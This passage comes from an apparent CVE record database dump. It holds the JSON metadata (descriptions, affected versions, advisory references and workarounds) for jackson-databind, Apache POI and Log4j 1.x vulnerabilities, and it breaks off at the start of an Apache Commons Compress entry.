"x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-07-27T00:00:00", descriptions: [ { lang: "en", value: "FasterXML 
jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2020-08-31T13:06:29", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHSA-2019:0877", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: 
"https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { name: "RHSA-2019:1782", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { name: "RHSA-2019:1797", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2804", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "RHSA-2019:3002", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "RHSA-2019:3140", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: 
"https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2018-14719", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", 
value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { name: "https://github.com/FasterXML/jackson-databind/issues/2097", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", refsource: "CONFIRM", url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { name: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "RHSA-2019:0782", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHSA-2019:0877", refsource: "REDHAT", url: 
"https://access.redhat.com/errata/RHSA-2019:0877", }, { name: "RHBA-2019:0959", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "DSA-4452", refsource: "DEBIAN", url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", refsource: "BUGTRAQ", url: "https://seclists.org/bugtraq/2019/May/68", }, { name: "https://security.netapp.com/advisory/ntap-20190530-0003/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { name: "RHSA-2019:1782", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { name: "RHSA-2019:1797", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2804", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { name: "RHSA-2019:2858", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "RHSA-2019:3002", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "RHSA-2019:3140", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", refsource: "MLIST", url: 
"https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2018-14719", datePublished: "2019-01-02T18:00:00", dateReserved: "2018-07-28T00:00:00", dateUpdated: "2024-08-05T09:38:13.192Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2019-12415
Vulnerability from cvelistv5
| Vendor | Product | Version |
|---|---|---|
| n/a | Apache POI | Version: Apache POI up to 4.1.0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T23:17:40.071Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "[tika-user] 20191105 Is tika-parsers exposed to CVE-2019-12415", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/2ac0327748de0c2b3c1c012481b79936797c711724e0b7da83cf564c%40%3Cuser.tika.apache.org%3E", }, { name: "[tika-user] 20191105 Re: Is tika-parsers exposed to CVE-2019-12415", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/895164e03a3c327449069e2fd6ced0367561878b3ae6a8ec740c2007%40%3Cuser.tika.apache.org%3E", }, { name: "[tika-user] 20191106 Re: Is tika-parsers exposed to CVE-2019-12415", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/d88b8823867033514d7ec05d66f88c70dc207604d3dcbd44fd88464c%40%3Cuser.tika.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 CVEs (vulnerabilities) that apply to Solr 8.4.1", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://lists.apache.org/thread.html/13a54b6a03369cfb418a699180ffb83bd727320b6ddfec198b9b728e%40%3Cannounce.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: 
"https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache POI", vendor: "n/a", versions: [ { status: "affected", version: "Apache POI up to 4.1.0", }, ], }, ], descriptions: [ { lang: "en", value: "In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.", }, ], problemTypes: [ { descriptions: [ { description: "Information Disclosure", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2021-10-20T10:38:23", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { name: "[tika-user] 20191105 Is tika-parsers exposed to CVE-2019-12415", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/2ac0327748de0c2b3c1c012481b79936797c711724e0b7da83cf564c%40%3Cuser.tika.apache.org%3E", }, { name: "[tika-user] 20191105 Re: Is tika-parsers exposed to CVE-2019-12415", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/895164e03a3c327449069e2fd6ced0367561878b3ae6a8ec740c2007%40%3Cuser.tika.apache.org%3E", }, { name: "[tika-user] 20191106 Re: Is tika-parsers exposed to CVE-2019-12415", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/d88b8823867033514d7ec05d66f88c70dc207604d3dcbd44fd88464c%40%3Cuser.tika.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 CVEs 
(vulnerabilities) that apply to Solr 8.4.1", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://lists.apache.org/thread.html/13a54b6a03369cfb418a699180ffb83bd727320b6ddfec198b9b728e%40%3Cannounce.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@apache.org", ID: "CVE-2019-12415", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Apache POI", version: { version_data: [ { version_value: "Apache POI up to 4.1.0", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: 
"eng", value: "Information Disclosure", }, ], }, ], }, references: { reference_data: [ { name: "[tika-user] 20191105 Is tika-parsers exposed to CVE-2019-12415", refsource: "MLIST", url: "https://lists.apache.org/thread.html/2ac0327748de0c2b3c1c012481b79936797c711724e0b7da83cf564c@%3Cuser.tika.apache.org%3E", }, { name: "[tika-user] 20191105 Re: Is tika-parsers exposed to CVE-2019-12415", refsource: "MLIST", url: "https://lists.apache.org/thread.html/895164e03a3c327449069e2fd6ced0367561878b3ae6a8ec740c2007@%3Cuser.tika.apache.org%3E", }, { name: "[tika-user] 20191106 Re: Is tika-parsers exposed to CVE-2019-12415", refsource: "MLIST", url: "https://lists.apache.org/thread.html/d88b8823867033514d7ec05d66f88c70dc207604d3dcbd44fd88464c@%3Cuser.tika.apache.org%3E", }, { name: "[lucene-solr-user] 20200320 CVEs (vulnerabilities) that apply to Solr 8.4.1", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { name: "https://lists.apache.org/thread.html/13a54b6a03369cfb418a699180ffb83bd727320b6ddfec198b9b728e@%3Cannounce.apache.org%3E", refsource: "MISC", url: "https://lists.apache.org/thread.html/13a54b6a03369cfb418a699180ffb83bd727320b6ddfec198b9b728e@%3Cannounce.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuoct2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2021.html", refsource: "MISC", url: 
"https://www.oracle.com/security-alerts/cpujan2021.html", }, { name: "https://www.oracle.com/security-alerts/cpuApr2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { name: "https://www.oracle.com//security-alerts/cpujul2021.html", refsource: "MISC", url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { name: "https://www.oracle.com/security-alerts/cpuoct2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2019-12415", datePublished: "2019-10-23T19:27:20", dateReserved: "2019-05-28T00:00:00", dateUpdated: "2024-08-04T23:17:40.071Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2022-23302
Vulnerability from cvelistv5
| URL | Tags |
|---|---|
| https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w | x_refsource_MISC |
| https://logging.apache.org/log4j/1.2/index.html | x_refsource_MISC |
| http://www.openwall.com/lists/oss-security/2022/01/18/3 | mailing-list, x_refsource_MLIST |
| https://www.oracle.com/security-alerts/cpuapr2022.html | x_refsource_MISC |
| https://security.netapp.com/advisory/ntap-20220217-0006/ | x_refsource_CONFIRM |
| https://www.oracle.com/security-alerts/cpujul2022.html | x_refsource_MISC |
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Log4j 1.x | Version: 1.0.1 < unspecified; Version: unspecified < 2.0-alpha1 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-03T03:36:20.336Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { name: "[oss-security] 20220118 CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20220217-0006/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Log4j 1.x", vendor: "Apache Software Foundation", versions: [ { lessThan: "unspecified", status: "affected", version: "1.0.1", versionType: "custom", }, { lessThan: "2.0-alpha1", status: "affected", version: "unspecified", versionType: "custom", }, ], }, ], credits: [ { lang: "en", value: "Eduardo' Vela, Maksim Shudrak and Jacob Butler from Google.", }, ], descriptions: [ { lang: "en", value: "JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. 
Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, ], metrics: [ { other: { content: { other: "high", }, type: "unknown", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-502", description: "CWE-502 Deserialization of Untrusted Data", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2022-07-25T16:49:03", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { tags: [ "x_refsource_MISC", ], url: "https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w", }, { tags: [ "x_refsource_MISC", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { name: "[oss-security] 20220118 CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20220217-0006/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], source: { discovery: "UNKNOWN", }, title: "Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", workarounds: [ { lang: "en", value: "Users should upgrade to Log4j 2 or remove usage of the JMSSink from their configurations.", }, ], x_generator: { engine: "Vulnogram 0.0.9", }, x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@apache.org", ID: "CVE-2022-23302", STATE: "PUBLIC", TITLE: "Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Apache Log4j 1.x", version: { version_data: [ { version_affected: 
">=", version_value: "1.0.1", }, { version_affected: "<", version_value: "2.0-alpha1", }, ], }, }, ], }, vendor_name: "Apache Software Foundation", }, ], }, }, credit: [ { lang: "eng", value: "Eduardo' Vela, Maksim Shudrak and Jacob Butler from Google.", }, ], data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, ], }, generator: { engine: "Vulnogram 0.0.9", }, impact: [ { other: "high", }, ], problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-502 Deserialization of Untrusted Data", }, ], }, ], }, references: { reference_data: [ { name: "https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w", refsource: "MISC", url: "https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w", }, { name: "https://logging.apache.org/log4j/1.2/index.html", refsource: "MISC", url: "https://logging.apache.org/log4j/1.2/index.html", }, { name: "[oss-security] 20220118 CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", refsource: "MLIST", url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { name: "https://www.oracle.com/security-alerts/cpuapr2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { name: 
"https://security.netapp.com/advisory/ntap-20220217-0006/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20220217-0006/", }, { name: "https://www.oracle.com/security-alerts/cpujul2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], }, source: { discovery: "UNKNOWN", }, work_around: [ { lang: "en", value: "Users should upgrade to Log4j 2 or remove usage of the JMSSink from their configurations.", }, ], }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2022-23302", datePublished: "2022-01-18T15:25:20", dateReserved: "2022-01-16T00:00:00", dateUpdated: "2024-08-03T03:36:20.336Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2019-12402
Vulnerability from cvelistv5
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Commons Compress | Version: 1.15 to 1.18 |
